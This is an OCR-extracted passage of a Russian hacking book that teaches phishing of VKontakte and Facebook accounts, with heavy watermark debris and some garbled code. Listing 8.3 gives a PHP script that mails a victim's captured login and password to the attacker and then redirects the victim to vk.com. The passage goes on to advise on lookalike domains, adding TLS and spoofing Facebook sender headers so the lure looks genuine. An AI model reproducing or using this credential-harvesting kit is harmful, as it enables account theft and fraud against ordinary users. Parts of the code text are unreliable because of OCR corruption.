книги хакеры / Что такое хакинг
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|||
|
|
|
C |
|
|
E |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
|
d |
|
|
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
|
t |
|
|
|
|
F |
|
|
|
|
|
|
|
t |
|
||
|
D |
|
|
|
|
|
|
|
|
|
i |
|
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
|
|
P |
|
|
|
|
|
NOW! |
o |
|||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||
|
|
|
|
|
BUY |
'\.11,11111 11,1 lliJll'll'P·I\ |
|
|
|
|
|
BUY |
|
|
|
|
|
|
||||||||
|
|
|
|
to |
Теперь все данные форма будет отправлять сценарию login.php. Его |
нужно |
to |
|
|
|
|
|
|
|||||||||||||
w |
|
|
|
|
|
|
|
|
|
|
||||||||||||||||
|
|
|
w |
|
|
|
|
|
|
|
|
|
||||||||||||||
w Click |
|
|
|
|
|
|
|
|
m |
|
|
w Click |
|
|
|
|
|
|
|
m |
||||||
|
|
|
|
|
|
поместить |
в |
тот же каталог, что и наш index.html. Код этого сценария при |
|
|
|
g |
|
|
|
|||||||||||
|
w |
|
|
|
|
|
|
|
e |
|
|
|
w |
|
|
|
|
|
|
e |
|
|||||
|
|
|
|
|
|
|
|
|
|
o |
|
|
|
|
|
|
|
|
|
|
|
|
o |
|
||
|
. |
|
|
|
|
|
g |
.c |
|
|
|
|
. |
|
|
|
|
|
|
.c |
|
|||||
|
|
p |
df |
|
|
|
|
|
|
|
|
|
|
|
p |
df |
|
|
n |
|
|
|
|
|||
|
|
|
|
|
|
n |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
|||||
|
|
|
|
|
|
веден в листинге 8.3. |
|
|
|
|
|
|
|
|
|
|
|
|
Листинг 8.3. Код сценария login.php
<?php
//Получаем данные из формы $email $_POST['email']; $login = $ POST['login'];
//разумеется, hacker@example.org меняем на свой адрес электронной почты
mail( 'hacker@example.org', 'Passwords соте', "Login $email Pass $pass");
// Перенаправляем пользователя на главную страничку ВКонтакте
header('Location: https://vk.com'); ?>
Мы понимаем, что язык программирования РНР ты, скорее всего, не знаешь. Попытаемся разжевать максимально подробно. Первым делом наш сцена рий получает данные из формы. Поскольку наша форма использует метод POST (см. method=»post» в коде формы), то мы используем массив $_POST. Если тебе встретится странная форма, передающая логин и пароль методом GET, то данные нужно искать в массиве $_GET.
Далее мы с помощью функции mail() отправляем введенные пользователем значения на твою электронку. Мы не стали морочить голову с заголовками письма, поэтому письмо может попасть в папку Спам. Периодически про веряй ее в поисках пароля. А можешь сам попробовать ввести логин и па роль для проверки формы, найти письмо в папке Спам и пометить его как не спам. В этом случае письма больше не будут попадать в Спам.
Далее, чтобы пользователь ничего не заподозрил, мы перенаправляем его на главную страницу входа в ВК. Собственно, на этом все. Ты получаешь логин и пароль, а пользователь ничего не подозревает, продолжает пользоваться ВК дальше. Метод подходит для случаев, когда не нужно сбрасывать пароль жертвы.
--Фишинг - неплохой метод и с технической точки зрения совсем не сложный. Но дьявол кроется в деталях. От того, насколько качественно ты все реали зуешь, будет зависеть успех этого мероприятия. Например, в нашем случае:
- - - - - - -- - - - - -- -- - - - -- - - - - - - - -- - - - --- - - - - - - - -- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- --- _,
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
- |
|
|
|
|
|
d |
|
||||||
|
F |
|
|
|
|
|
|
|
t |
|
|
F |
|
|
|
|
|
|
|
t |
|
|||
|
D |
|
|
|
|
|
|
|
|
i |
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
|
o |
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
1 1.11:,1 S 1\: 10\111 :,1111111,1 ,1 1,1,:1\11101: 1\ lOllll,1.11,111,1\ l'l'l!l\ |
|
|
|
||||||||||||
|
|
|
|
to |
BUY |
|
|
|
|
|
|
|
|
|
|
|
to |
BUY |
|
|
|
|
|
|
w Click |
|
• Дляm |
|
|
|
|
|
|
|
|
|
|
m |
|||||||||||
|
|
экономии времени мы не стали публиковать картинку со смартфономw Click |
|
|
|
|
|
|
||||||||||||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
||
|
w |
|
|
|
|
|
|
|
|
|
o |
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
|
.c |
|
|
. |
|
|
|
|
|
|
.c |
|
|||||
|
|
p |
|
|
|
|
g |
|
|
|
на странице входа. Это косяк. Не то, чтобы явный, но некоторые пользо |
|
|
g |
|
|
|
|||||||
|
|
|
|
|
|
|
|
|
|
|
|
p |
|
|
|
|
|
|
|
|||||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
ватели могут заметить.
• Также мы не использовали сайт с SSL. Обрати внимание - возле значка VPN есть значок восклицательного знака. Он говорит о том, что HTTPS не используется. Это тоже прокол. Нужно купить самый дешевый серти фикат или прикрутить бесплатный сертификат Let's Encrypt. Конечные инструкции ты узнаешь у хостера, у которого купил хостинг под все это дело.
• Многое зависит от доменного имени, которое ты купишь. Насколько оно будет похоже на имя той сети, страничку в которой ты хочешь взломать. Конечно, глупых пользователей много и некоторые могут попросту не обратить внимание на адрес, но тебе же не хочется, чтобы пользователь заметил фейк?
• Огромное внимание нужно уделить письму, которое предназначено, что бы заманить пользователя на фейковую страничку. Подделать его нужно . полностью, до мельчайших подробностей, включая заголовки письма. О том, как подделать заголовки письма было сказано в главе 3. Например, для Facebook заголовки выглядят так:
$headers = 'From: Facebook <notification@facebookmail.com>'
. "\r\n" .
'Reply-to: noreply <noreply@facebookmail.com>' . "\r\n";
mail($to, $subject, $message, $headers);
Примечание. Почему очень важно подцелать заголовки? Да потому что некоторые пользователи сортируют сообщения от социальных сетей. Они попадают в определенную папку в ин терфейсе почтовой программы. Если письмо попадет в другую папку, то ты прокололся уже в самом начале, так ничего и не начав. С вероятностью 90% можно сказать, что пользователь не перейдет по ссылке в твоем письме
Код письма, которое отправляет социальная сеть, можно получить при про смотре оригинала сообщения в почтовой программы. Зарегистрируйся в той
социальной сети, страничку. в которой ты хочешь взломать. Открой письмо от социальной сети. Возможно, нужно будет подождать, пока сеть пришлет---
•тебе то письмо, которое подходит для твоей цели. Например, когда кто то
. - -- - -- - - - --- - - - - - - - --- -- - - - - - - - - - - - .- - - - - - -. . - - - - - - --- --- - - - - - - - - ... - - - . - - - - . - - .
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||||
|
|
X |
|
|
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
|||||
|
- |
|
|
|
|
d |
|
|
|
|
|
|
- |
|
|
|
|
|
d |
|
|||||
|
F |
|
|
|
|
|
t |
|
|
|
|
F |
|
|
|
|
|
|
|
t |
|
||||
|
D |
|
|
|
|
|
|
i |
r |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
r |
|||||
P |
|
|
|
|
|
NOW! |
o |
|
|
P |
|
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||
|
|
|
|
|
BUY |
,al,11111 11,1 IIIJll'll'(l:I\ |
|
|
|
|
|
|
|
BUY |
|
|
|
|
|
|
|||||
|
|
|
|
to |
|
|
|
|
|
|
|
|
|
|
|
|
to |
|
|
|
|
|
|
||
w Click |
|
b5efe3629ba8Gla&eem |
AYЗMKGdB2m3JaaJQfq45UgeK7UfE7Vag5d07dkOiQnClick |
|
|
|
|
|
|
m |
|||||||||||||||
|
|
|
|
|
|
|
|
|
|||||||||||||||||
w |
|
|
|
|
|
|
|
|
o |
|
= |
|
w |
|
|
|
|
|
|
|
|
o |
|
||
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
||
|
. |
df-xchann ULrQljmN0UlL_nG9uSlkRXSo3_eqpЫeQ> |
|
w |
|
df-x chan |
|
.c |
|
||||||||||||||||
|
|
|
. |
|
|
||||||||||||||||||||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
|
|
|
|
e |
|
|
|
|
|
|
|
|
|
|
|
|
|
e |
|
|||
|
|
|
|
|
|
Feedback-ID: 0:Ьirthday_reminder:Facebook |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
X-FACEBOOK-PRIORITY: О |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
X-Auto-Response-Suppress: All |
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
|
|
|
|
|
|
MIME-Version: 1.0 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||
|
|
|
|
|
|
|
|
|
|
|
это |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
но |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
|
|
|
|
|
|
их заголовках письма. А можно использовать библиотеку РНР |
генери |
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
рования UUID и автоматизировать этот процесс. Тогда каждое новое письмо, |
|
|
|
|
|
|
|
|
|||||||||||
|
|
|
|
|
|
которое ты отправляешь, будет со своим UUID. |
этого используется та |
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
|
кой сценарий (лист. 8.5). |
|
|
|
|
|
|
|
|
|
|
|
|
|
Листинг 8.5. Сценарий генерирования UUID
<?php
require 'vendor/autoload.php';
use Ramsey\Uuid\Uuid;
use Ramsey\Uuid\Exception\UnsatisfiedDependencyException; try
// Версия 1 (основана на времени) $uuidl = Uuid::uuidl();
echo· $uuidl->toString() . "\n"; // i.e. e4eaaaf2-d142- llel-b3e4-080027620cdd
// Версия 3. (на базе названия и MDS)
$uuid3 = Uuid::uuidЗ(Uuid::NAМESPACE_DNS, 'php.net'); echo $uuid3->toString() . "\n"; // i.e. lla38b9a-Ь3da-
360f-9353-a5a725514269
// Версия 4 (случайный набор символов) $uuid4 = Uuid::uuid4();
echo $uuid4->toString() . "\n"; // i.e. 25769cбc-d34d- 4bfe-ba98-e0ee856f3e7a
-- - - - - - - - - -- - - - - -- - - --- - - - - - - --- --- - - - - - - - -- - - - - - - - - - - - - - - - - - - -- -- - ---- - ----------.
// Версия 5 (на базе названия и SHAl)
$uuid5 = Uuid::uuidS(Uuid::NAМESPACE_DNS, 'php.net'); •
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
||
|
|
|
C |
|
E |
|
|
|
|
|
|
|
C |
|
E |
|
|
|
||||||
|
|
X |
|
|
|
|
|
|
|
|
|
X |
|
|
|
|
|
|
||||||
|
- |
|
|
|
|
|
d |
|
|
|
|
- |
|
|
|
|
|
d |
|
|||||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
|
|
|
|
|
|
|
|
r |
||||
P |
|
|
|
|
|
NOW! |
o |
|
|
P |
|
|
|
|
NOW! |
o |
||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||||
|
|
|
|
|
BUY |
|
|
|
) 1.11"1 : 1\: 111'111 "1111111,1 |
.11,1"11111(11, 1: ,111111,111,11!,1\ l'l 1\1\ |
BUY |
|
|
|||||||||||
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
w Click |
to |
|
|
|
|
|
|
|
|
|
w Click |
to |
|
|
|
|
|
|
|
|||||
|
|
|
g |
|
|
m |
echo |
$uuid5->toString() . "\n"; |
|
|
|
g |
|
|
m |
|||||||||
w |
p |
|
|
|
|
|
|
|
// i.е. c4a760a8-dbcf-p |
|
|
|
|
|
|
|
||||||||
|
w |
|
|
|
|
|
|
|
|
o |
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
|
.c |
|
|
|
|
. |
|
|
|
|
|
|
.c |
|
|||
|
|
|
df |
|
|
n |
e |
|
|
|
|
|
df |
|
|
n |
e |
|
||||||
|
|
|
|
-xcha |
|
|
|
|
|
|
|
|
|
|
-x cha |
|
|
|
|
|
||||
|
|
|
|
|
|
5254-a0d9-бa4474bdlb62 |
|
|
|
|
|
|
|
|
|
|
|
catch (UnsatisfiedDependencyException $е)
//В случае ошибки
//использования 32-битной системы. Или отсутствия
библиотеки Moontoast\Math.
echo 'Caught exception: ' . $e->getMessage() . «\n»;
Загрузить саму библиотеку, которая занимается непосредственно генериро ванием UUID, можно по адресу https://github.com/ramsey/uuid.
Для более удобного формирования заголовков и отправки сообщений в формате HTML можно использовать библиотеку PНPMailer: https://github. com/PHPMailer/PHPMailer. Данная библиотека позволяет не только просто отправлять сообщения в формате HTML, но и сообщения со вложениями. Возможно, при взломе социальных аккаунтов тебе эта возможность и не по надобится. Но она нужна много где еще. В лист. 8.6 приводится пример
отправки сообщения со вложением.
Листинг 8.6. Отправка сообщения с вложением
<?php
// Подключаем PHPMailer
use PHPMailer\PHPMailer\PHPMailer; require ' .. /vendor/autoload.php';
//Создаем новый экземпляр объекта $mail = new PHPMailer();
//Устанавливаем заголовок From
$mail->setFrom('from@example.com', 'First Last'); // Устанавливаем заголовок Reply-to
$mai1->addReplyTo('rep1yto@example.com', 'First Last'); // Добавляем адрес $mail->addAddress('whoto@example.com', 'John Doe');
//Устанавливаем тему письма $mail->Subject = 'test';
//Добавляем НТМL-код письма
$mail->msgHTML(file_get_contents('contents.html'), DIR );
// Добавляем обычную текстовую версию письма (необязательно...)
•$mail->AltBody = 'This is а plain-text message body'; //Добавляем вложение - картинку
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .